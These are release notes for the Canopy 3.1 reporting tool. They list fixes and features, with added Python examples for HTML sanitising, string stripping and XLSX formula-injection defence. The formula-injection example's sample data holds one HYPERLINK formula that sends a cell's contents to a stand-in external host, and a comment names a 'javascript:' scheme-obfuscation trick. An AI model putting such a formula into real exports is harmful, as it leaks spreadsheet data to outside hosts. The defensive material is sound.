Release notes for Canopy 3.1

3.1.7

Bug

[CAN-2359] - TinyMCE XSS via embed elements (CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N, base score 4.8, Medium)
[CAN-2360] - API sorting doesn't reset existing sorts
[CAN-2364] - Jira authentication fails

3.1.6

Bug

[CAN-2272] - Qualys importer does not wrap examples in pre block
[CAN-2311] - OpenVAS v9 importer error: TypeError: unhashable type: 'dict'
[CAN-2340] - KB import fails with exception when references are present

New Feature

[CAN-2328] - Support for Acunetix scanner

Improvement

[CAN-2358] - Order report findings by title, last

3.1.5

Added Ubuntu 18.04 support.

Bug

[CAN-2238] - SoW Reference column has incorrect formatting
[CAN-2240] - Scope revenue field has incorrect formatting
[CAN-2262] - xlsx export should use primary findings by default
[CAN-2263] - PhaseContact edit dialog incorrectly detects modifications upon close
[CAN-2281] - Methodology phase view doesn't show description/guides/references in an obvious way
[CAN-2282] - Filtering phases from the project view results in HTTP 500
[CAN-2291] - Tool importer fails when examples contain NUL characters when using postgresql
[CAN-2296] - Some canopy settings are not available via the UI without manual creation from command line

Improvement

[CAN-2294] - Additional cross-reference types in report xml

3.1.4

Bug

[CAN-2236] - Non-admins cannot view message templates when attempting to send emails from phase view when using dummy data

Improvement

[CAN-2237] - Support asset access in message templates

Add email pre-processing plugin hook

3.1.3

Security

The following XSS instances were corrected:

  • [CAN-2219] - XSS in project access control dialog
  • XSS via project name in scheduler
  • XSS in custom roles membership list in admin section
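
The XSS items above, CAN-2359 (TinyMCE XSS via embed elements) in 3.1.7 and the profile image, signature image and login banner instances fixed in 3.1.0, all come down to user-supplied HTML or URLs reaching the page unfiltered. How Canopy fixed each one is not described in these notes. The following is an added example, not Canopy's code, of the server-side control a reviewer would look for: an allowlist sanitiser that re-serialises rich-text HTML, drops `embed`, `object`, `iframe`, `script` and every event-handler attribute, and rejects non-http(s) URLs in `href`/`src`. The element and attribute allowlist is an assumption about what report content needs; the test inputs are constructed.

```python
import re
from html import escape
from html.parser import HTMLParser

# Added example: a server-side allowlist sanitiser for rich-text (TinyMCE) HTML.
# Not Canopy's code; the allowlist below is an assumption about what report
# content needs and should be adjusted to the fields actually stored.

# Permitted elements and, per element, the attributes kept. Everything else is
# removed; text inside a removed element is kept unless the element is in
# DROP_WITH_CONTENT. 'embed' is a void element, so dropping its tag suffices.
ALLOWED = {
    "p": set(), "br": set(), "b": set(), "strong": set(), "i": set(), "em": set(),
    "u": set(), "ul": set(), "ol": set(), "li": set(), "pre": set(), "code": set(),
    "h1": set(), "h2": set(), "h3": set(), "table": set(), "thead": set(),
    "tbody": set(), "tr": set(), "th": set(), "td": set(),
    "a": {"href", "title"}, "img": {"src", "alt", "width", "height"},
}
VOID = {"br", "img"}
DROP_WITH_CONTENT = {"script", "style", "object", "iframe", "svg", "math"}
SAFE_SCHEMES = ("http://", "https://", "mailto:")


def safe_url(value: str) -> bool:
    """Allow http(s)/mailto and relative URLs. Control characters and spaces are
    removed first because browsers ignore them inside a scheme ("java\\tscript:")."""
    v = re.sub(r"[\x00-\x20]", "", value).lower()
    return v.startswith(SAFE_SCHEMES) or ":" not in v


class Sanitiser(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside an element whose content is dropped

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = 1
            return
        if tag not in ALLOWED:
            return  # unknown element (embed, form, ...): drop the tag, keep its text
        kept = []
        for name, value in attrs:
            if name not in ALLOWED[tag] or value is None:
                continue  # this also drops every on* handler and style attribute
            if name in ("href", "src") and not safe_url(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self.skip_depth:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth -= 1
            return
        if tag in ALLOWED and tag not in VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))


def sanitise(html: str) -> str:
    """Return `html` reduced to the allowlist. The output is re-serialised from
    parsed tokens, so no byte of the input reaches the page unescaped."""
    parser = Sanitiser()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)
```

Run this on every rich-text field at save time, not only in the editor: TinyMCE's own `valid_elements`/`invalid_elements` settings are a client-side convenience, and the same content can be posted straight to the DRF endpoints listed further down in these notes, bypassing the editor entirely.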

Bug

[CAN-1479] - TinyMCE editor does not show field errors
[CAN-1848] - Rich text in report tables not displaying
[CAN-1849] - Rich text in report tables not saved in some cases
[CAN-2021] - Report row renderer handles long lines poorly
[CAN-2043] - Breadcrumbs do not handle selection of records with duplicated titles
[CAN-2122] - Scheduler modifies records on render resulting in dirty records
[CAN-2141] - Message preview error when formatting does not encapsulate the entire template variable
[CAN-2164] - Authors Autocomplete on report properties doesn't work
[CAN-2189] - XML Postprocessors do not run when mapping xml is generated
[CAN-2200] - Possible bug in email generation when using PR workflow
[CAN-2201] - report.type validation failure leads to general error in the UI
[CAN-2208] - Message template: daily summary includes ignored and group members in default list
[CAN-2209] - nmap importer fails with "add() takes only one argument"
[CAN-2210] - Permissions take too long to propagate to the frontend in certain circumstances
[CAN-2211] - Portals list's primary and selection toolbars both visible when a selection is made
[CAN-2213] - Email preview permissions misalignment
[CAN-2218] - DATA_PATH does not get created with fresh installations
[CAN-2220] - Phase uploads with a comma in the name breaks downloading and insertion into findings
[CAN-2225] - User email changes are not reflected in user role slugs
[CAN-2231] - File ID prefixed to downloaded documents

New Feature

[CAN-2206] - Add DRF auth token (re)generation endpoint (/api/accounts/profile/reset_token/)

Task

[CAN-2229] - Upgrade prbac and remove json-field workarounds

Improvement

[CAN-2010] - Clarify custom field field names in admin UI
[CAN-2224] - Message templates should support custom fields
[CAN-2226] - Allow filtering on phase fields from project list
[CAN-2228] - Allow users to close main menu by clicking outside of it

3.1.2

Bug

[CAN-1411] - Comments component lacks mask and error handling
[CAN-1479] - TinyMCE editor does not show field errors
[CAN-1480] - Many grids and comboboxes are missing the `emptyText` property
[CAN-1495] - Missing renderers for activity log entries
[CAN-1520] - Incorrect multi-character usage of strip()/lstrip()/rstrip()
[CAN-1679] - Tool files that fail to import do not report failure in UI
[CAN-1730] - Reports 'kanban' should sort by report_due_date
[CAN-1805] - Comments endpoint doesn't do sufficient permission checking
[CAN-1854] - PDF generation should be async
[CAN-1889] - Rich text custom fields should always be content fields
[CAN-1904] - UI exception (being investigated)
[CAN-1919] - Unable to delete multiple references from a finding
[CAN-1992] - Long project/phase titles push buttons off viewport
[CAN-2030] - Modifying the content/structure of a document template should update the last modified date
[CAN-2044] - Report generation retry doesn't update status on generated reports
[CAN-2132] - Total finding status counts not output in XML
[CAN-2142] - Project creation dialog lists SoWs from all clients when opened from client view
[CAN-2143] - No way to link/unlink findings and assets from asset view
[CAN-2144] - Activity log entry creation fails when adding multiple findings from the KB
[CAN-2148] - RelatedObjectDoesNotExist: UserProfile has no prbac_role.
[CAN-2164] - Authors Autocomplete on report properties doesn't work
[CAN-2175] - Disable DRF web API browser
[CAN-2178] - Exception in scheduler events endpoint
[CAN-2181] - Ticket creation window doesn't handle typing into container combo
[CAN-2195] - "Further Reading" section is not populated when a Nessus finding is inserted
[CAN-2197] - Django doesn't handle certain Oracle connection states
[CAN-2198] - Celery doesn't honour CONN_MAX_AGE
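
CAN-1520 above is a Python pitfall worth spelling out, since it tends to surface in importers and path handling: `str.strip()`, `lstrip()` and `rstrip()` take a set of characters to remove, not a prefix or suffix string, so `url.lstrip("https://")` also eats any leading `h`, `t`, `p`, `s`, `:` or `/` of the host name. The following is an added example, not Canopy's code, showing the buggy call beside a correct prefix/suffix removal; the URLs and file names are constructed.

```python
from urllib.parse import urlsplit

# Added example for the pitfall behind CAN-1520. Not Canopy's code; inputs are
# constructed.


def buggy_strip_scheme(url: str) -> str:
    """The mistake: lstrip("https://") removes every leading character that is
    one of h, t, p, s, ':' or '/', so it eats into the host name as well."""
    return url.lstrip("https://")


def strip_prefix(text: str, prefix: str) -> str:
    """Remove `prefix` exactly once, and only if `text` actually starts with it.
    (Python 3.9+ has str.removeprefix() with the same semantics.)"""
    return text[len(prefix):] if prefix and text.startswith(prefix) else text


def strip_suffix(text: str, suffix: str) -> str:
    """Remove `suffix` exactly once, and only if `text` actually ends with it.
    (Python 3.9+ has str.removesuffix().)"""
    return text[:-len(suffix)] if suffix and text.endswith(suffix) else text


def scheme_and_host(url: str) -> tuple:
    """For URLs specifically, do not trim strings at all: use the standard
    library parser, which also copes with ports, userinfo and IPv6 literals."""
    parts = urlsplit(url)
    return parts.scheme, parts.hostname
```

The same trap applies to `rstrip(".docx")` on file names and to `strip("\r\n")`, which is harmless only because those characters never occur inside the text you want to keep.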

New Feature

[CAN-2184] - DRF token authentication
[CAN-2185] - KB export endpoint
[CAN-2193] - Plugin based DRF endpoints

Task

[CAN-1781] - Get updated scheduler in usable state
[CAN-2172] - Add xml formatter to DRF
[CAN-2199] - Adjust gunicorn and celery settings to reduce baseline resource usage and to cycle workers

Improvement

[CAN-1870] - Standardise on capitalisation throughout Canopy
[CAN-1954] - Schedule project view should show client
[CAN-2072] - Handle missing email templates more gracefully
[CAN-2073] - Custom logic for upgrading data
[CAN-2177] - ical events should be processed by email clients for better calendaring integration

3.1.1

Bug

[CAN-2156] - Add asset window field not visible
[CAN-2161] - Incorrect RPM versioning
[CAN-2164] - Authors Autocomplete on report properties doesn't work
[CAN-2174] - Total days missing from phases / report

New Feature

[CAN-1339] - Auto-increment reference fields

Improvement

[CAN-2162] - Sync xlsx and pdf files for each report to portal
[CAN-2169] - Only admins can give another user access to a project
[CAN-2176] - Display KB ID in KB grids

3.1.0

Backward compatibility changes

#TODO

Reports need remapping

Sub-task

[CAN-1782] - Move child blocks by same offset as parents, when parents are moved
[CAN-1783] - Date editing dialogs for projects/phases on scheduler
[CAN-1785] - Validate start/end dates of drag-'n'-dropped project- and phase blocks
[CAN-1786] - Add scheduler refresh button
[CAN-1787] - Visually indicate a resource's availability in the resource's scheduler grid row
[CAN-1788] - "Expand/collapse all" for scheduler grids
[CAN-1790] - Allow all resources to be unscheduled from a scheduled project/phase
[CAN-1796] - Pre-populate start/end dates of new phases/events with the parent's dates
[CAN-1797] - Update phase/schedule entry dates when project dates changed
[CAN-1807] - Lock project/phase date editing after being scheduled
[CAN-1891] - Allow template docx files to be downloaded
[CAN-1907] - Allow admins to create and manage custom roles
[CAN-1912] - Upgrade tinymce to latest
[CAN-1913] - Upgrade DRF to at least 3.5
[CAN-1917] - Selection of PR/QA reviewers per report
[CAN-1983] - Email notification: PR/QA required
[CAN-1984] - Email notification: report generated
[CAN-1985] - Email notification: report QA/PR status update
[CAN-1986] - Email notification: report deadline approaching
[CAN-1987] - Email message: report overdue
[CAN-1988] - Email notification - comments

Epic

[CAN-1843] - Team support
[CAN-1938] - Assessment delivery workflow emails

Bug

[CAN-1366] - Re-auth login screen requires refactoring
[CAN-1806] - User access panel shows 'no-one' for disabled users
[CAN-1822] - /api/messaging/comment/count/ breaks on Oracle DB
[CAN-1855] - Notification's object representations should be generated at notification time
[CAN-1862] - User can be scheduled outside of phase dates
[CAN-1863] - Single day phases can't be scheduled
[CAN-1915] - Creating a user without a role fails without error displayed in UI
[CAN-1929] - Report workflow state changes generate duplicate grants
[CAN-1967] - Django 1.8 only supports cx_Oracle 5.x and we are installing latest
[CAN-1969] - Build server uses the wrong version of the scheduler for Canopy 3.1 builds
[CAN-1972] - Fix alignment of segmented time scale buttons in scheduler toolbar
[CAN-1973] - Various issues with scheduler's resource view
[CAN-1975] - Oracle compat: get_or_create and update_or_create should not have TextFields in their lookup values
[CAN-1976] - Schedule entry editing fails when triggered from resource view
[CAN-1978] - Scheduler performance: only load scheduler events for the current time period
[CAN-1989] - Admins should not be able to delete built-in custom roles
[CAN-1990] - PR/QA roles listed as custom roles and can be deleted
[CAN-2000] - Template finding ID missing from XML mapping path
[CAN-2008] - Workflows do not initialise on registration
[CAN-2013] - TemplateDocumentContent model has incorrect unique_together constraint
[CAN-2025] - XSS in profile image
[CAN-2026] - XSS in signature image
[CAN-2027] - XSS in login banner
[CAN-2031] - XLSX generation allows Excel functions and macros to be embedded in the generated file
[CAN-2037] - Auto-refresh grids: reports
[CAN-2038] - Auto-refresh grids: sows
[CAN-2050] - Edit Opportunity - description field height issue
[CAN-2056] - Possible emailing permissions bug
[CAN-2057] - Drag and dropped images fail due to invalid checksum saving
[CAN-2060] - Custom fields are mandatory in the UI
[CAN-2063] - Output start and end dates in SoW XML
[CAN-2064] - SoW lead author
[CAN-2066] - SoW templates list includes deleted templates
[CAN-2075] - Phase scope location field save error
[CAN-2079] - Description field is cut off in opportunity edit dialog
[CAN-2080] - Consistency: use 'vulnerability' instead of 'finding' here
[CAN-2081] - Company custom fields not displaying in edit dialog
[CAN-2085] - Disabled custom fields not listed in admin section
[CAN-2090] - Email validation error not shown in user add/edit form
[CAN-2094] - Chart plugin data mapping
[CAN-2097] - Email preview not working
[CAN-2098] - HttpMethodSerializer doesn't differentiate between listings and individual lookups
[CAN-2100] - EditWindow field change detection inaccurate
[CAN-2105] - UI border on reports
[CAN-2108] - "Reporter" not set for imported findings
[CAN-2110] - Benchmark not generating correctly
[CAN-2115] - Projects not shown for senior analysts
[CAN-2124] - References data missing from generated XML
[CAN-2125] - Sample category charts set incorrect data for category axis
[CAN-2131] - Client icon inconsistent use
[CAN-2136] - Message template migration (canopy/migrations/0066_auto_20180412_1505.py) doesn't handle changes in titles
[CAN-2139] - Notifications icon does not clearly show the number of outstanding notifications
[CAN-2140] - Scheduler's team filtering generates exception
[CAN-2145] - collectstatic usage leads to incorrect static files in certain circumstances
[CAN-2151] - Split out KB admin permissions into a separate role
[CAN-2152] - Migrations do not run when upgrading from 3.0.7 to 3.1.0
[CAN-2153] - Report tables have incorrect field types in mapping xml
[CAN-2155] - SoW layout has no border width (spacing/padding)
[CAN-2157] - Re-test phase resets resolved finding status to open
[CAN-2158] - Out of scope flag missing from status list modifier
[CAN-2159] - pyc files are not properly removed/generated during package upgrades
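
CAN-2031 in the list above is the spreadsheet counterpart of XSS: finding titles, descriptions and host names in an xlsx export are attacker-influenced (they come from scanner output or client-supplied data), and a cell whose text begins with `=`, `+`, `-` or `@` is evaluated as a formula when the file is opened. The following is an added example, not Canopy's code, of the neutralisation step an exporter should apply to every string cell; the trigger characters follow the usual CSV/XLSX injection guidance, and the finding rows are constructed sample input.

```python
import re
from typing import Any, Dict, List

# Added example for CAN-2031 (formula injection in generated XLSX). Not Canopy's
# code; the trigger set is the commonly recommended one and the rows at the
# bottom are constructed sample input standing in for findings.

# A cell whose text starts with one of these is evaluated as a formula by Excel
# and LibreOffice (a leading tab or carriage return before '=' still triggers).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Strings that are really numbers ("-5", "+3.25", "1e3") should become numeric
# cells rather than quote-prefixed text, otherwise sums and sorting break.
_NUMERIC = re.compile(r"^[+-]?(?:\d+\.?\d*|\.\d+)(?:[eE][+-]?\d+)?$")


def neutralise_cell(value: Any, coerce_numbers: bool = True) -> Any:
    """Return a value that cannot be interpreted as a formula when written to a
    spreadsheet cell.

    Non-strings pass through untouched: numbers, dates and None are written as
    typed cells and are never evaluated. For strings, a leading single quote
    forces the cell to be stored as text; the quote itself is not displayed.
    """
    if not isinstance(value, str):
        return value
    if coerce_numbers and _NUMERIC.match(value.strip()):
        return float(value.strip())
    if value.lstrip().startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value


def neutralise_row(row: Dict[str, Any]) -> Dict[str, Any]:
    """Apply neutralise_cell to every column of one export row."""
    return {column: neutralise_cell(cell) for column, cell in row.items()}


def export_rows(findings: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
    """Prepare finding records for an xlsx writer. Every string column is
    neutralised, whatever its name, so a newly added field cannot be missed."""
    return [neutralise_row(finding) for finding in findings]


# Constructed sample rows; the title of the second one is the kind of
# scanner-supplied text this bug let through into generated files.
SAMPLE_FINDINGS = [
    {"id": 1, "title": "Reflected XSS in search", "cvss": 6.1, "host": "10.0.0.5"},
    {"id": 2, "title": '=HYPERLINK("https://example.invalid/?"&A1,"Open")',
     "cvss": 0.0, "host": "-"},
]
```

Two caveats when wiring this into a real writer: openpyxl treats any string assigned to a cell that starts with `=` as a formula unless the cell's `data_type` is explicitly set to `"s"`, so the prefix (or the data-type override) must happen before the value is assigned; and the single-quote marker is only understood by spreadsheet applications, so if the same data is also exported as CSV the quote should be combined with proper CSV quoting of the whole field.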

New Feature

[CAN-1388] - Email notifications
[CAN-1598] - Add Canopy status endpoint
[CAN-1601] - Add custom field support for other models
[CAN-1941] - Add message template support
[CAN-1943] - Email sending window
[CAN-1944] - Client message template: assessment scheduled
[CAN-1945] - Client message template: assessment commencement
[CAN-1946] - Preview email templates
[CAN-1947] - Let users pick email recipients from a list of contacts and Canopy users
[CAN-1948] - Support email recipients in To, CC and BCC fields
[CAN-1951] - Client message template - daily update summary
[CAN-1960] - Phase assessment type
[CAN-1971] - Filter scheduler records by teams
[CAN-1995] - Chart data plugin type
[CAN-1996] - Base chart data sets
[CAN-2019] - Client message template - phase (assessment) paused
[CAN-2020] - Client message template - phase (assessment) finished
[CAN-2039] - Auto-refresh findings/assets grids after file import
[CAN-2040] - Auto-refresh grids: findings/assets
[CAN-2089] - SoW classification field
[CAN-2112] - Custom chart requirements for enterprise customer
[CAN-2117] - Add version support to plugin system
[CAN-2128] - Custom category chart to output all ratings for all categories
[CAN-2129] - Asset location field not output in generated XML

Task

[CAN-1386] - Rename companies to clients
[CAN-1597] - Oracle DB compatibility
[CAN-1906] - Remove remaining customisation remnants
[CAN-1968] - Oracle compatibility
[CAN-1974] - Add route to scheduler on main nav
[CAN-1999] - Apache support via a default config and possibly a canopy-setup command
[CAN-2002] - Move from supervisord to systemd
[CAN-2015] - Expose additional django-auth-ldap settings in the canopy config file
[CAN-2016] - Extend canopy-manage setupdb to include more DB management actions
[CAN-2099] - Remove non-scheduler project/phase start/end/report date restrictions
[CAN-2113] - Normalize contact xml output for phasecontacts
[CAN-2146] - Move static files generation to build stage from installation stage

Improvement

[CAN-1352] - Align broken SoW generation with report generation
[CAN-1858] - Scheduler project/phase/user edit windows should allow for changing the colour
[CAN-1859] - Display phase reference in the scheduler project list
[CAN-1860] - Scheduler view improvements
[CAN-1861] - Warn users when assigning a resource to a project/phase older than today
[CAN-1864] - Send ical of schedule to users
[CAN-1865] - Incorporate project state into schedule view
[CAN-1866] - Scheduler time block views
[CAN-1869] - Scheduler styling
[CAN-1877] - Category and attack class filters for findings and KB
[CAN-1878] - Expose KB ID in the UI
[CAN-1880] - Set tech lead to the person who's creating the phase by default
[CAN-1881] - Set report defaults
[CAN-1884] - Hide menu items based on permissions
[CAN-1886] - Order projects by last modified
[CAN-1887] - Set default version on report
[CAN-1890] - Display source of finding in the UI
[CAN-1899] - Flexibility in the canopy installer
[CAN-1916] - Move "User Skills" admin page to a tab under the "Users" page
[CAN-1923] - Review read permissions on users endpoint
[CAN-1927] - Phase and Project status options should include 'paused' or be user definable
[CAN-1934] - Create a role for the scheduler user
[CAN-1936] - Permissions functions should fail hard on non-existent permissions
[CAN-1937] - Add table truncation and table dropping to setupdb management command
[CAN-1953] - Project/Phase colour or highlight by status
[CAN-1956] - Scheduling a user should warn if the user is already scheduled on the dates requested
[CAN-1977] - Category and access control filters
[CAN-1980] - Mark users as unavailable in the scheduler
[CAN-1981] - Adjust report warning rules
[CAN-1991] - Phase and phase scopes should indicate location of testing
[CAN-1997] - Separate PR and QA reviewer lists on edit report
[CAN-2001] - Category and access control filters for add from KB findings
[CAN-2004] - Report due and overdue thresholds
[CAN-2005] - Report lead_author mandatory and auto-set
[CAN-2009] - Automatically add users who edit a report as an author
[CAN-2012] - Move findings to a tab in the report view
[CAN-2022] - Add support for mapping AD groups to user roles
[CAN-2023] - Add TLS options for outbound connections
[CAN-2035] - Expose User address field in UI and XML output
[CAN-2045] - SoW output per-scope costs
[CAN-2046] - Phase scope location field combo
[CAN-2047] - Phase scope edit window WYSIWYG field height
[CAN-2048] - Cosmetic: Phase Scoped Edit Window - Billable days -> Billable units
[CAN-2051] - SoW set defaults
[CAN-2058] - Include role in versions table
[CAN-2059] - Add latest version field from versions table
[CAN-2067] - SoW model missing dates, references, and lead author fields
[CAN-2068] - Remove "Total Days" field from opportunity read view
[CAN-2069] - Set default status "Open" for SoW and phase scope
[CAN-2071] - Improve generic UI error message
[CAN-2077] - Add support for using different serializers for listings
[CAN-2078] - Opportunities have no account manager set and can't be updated
[CAN-2082] - Usability improvement suggestion for Adding vulnerabilities
[CAN-2084] - Unstyled "New assets" text field
[CAN-2087] - Phase contacts
[CAN-2092] - Customise phase/report export spreadsheet by using user provided template
[CAN-2093] - XLSX filename template
[CAN-2114] - Chart plugin interface refactor
[CAN-2119] - HTML support for template messages (email notifications)
[CAN-2126] - Document custom table cells should differentiate between XHTML and non-XHTML data
[CAN-2130] - Add localisation configuration for static finding content fields
[CAN-2137] - Set output in report to true by default for manually added examples
[CAN-2149] - TinyMCE improve paste defaults
[CAN-2150] - Phase reference unique constraint should be unique within its associated project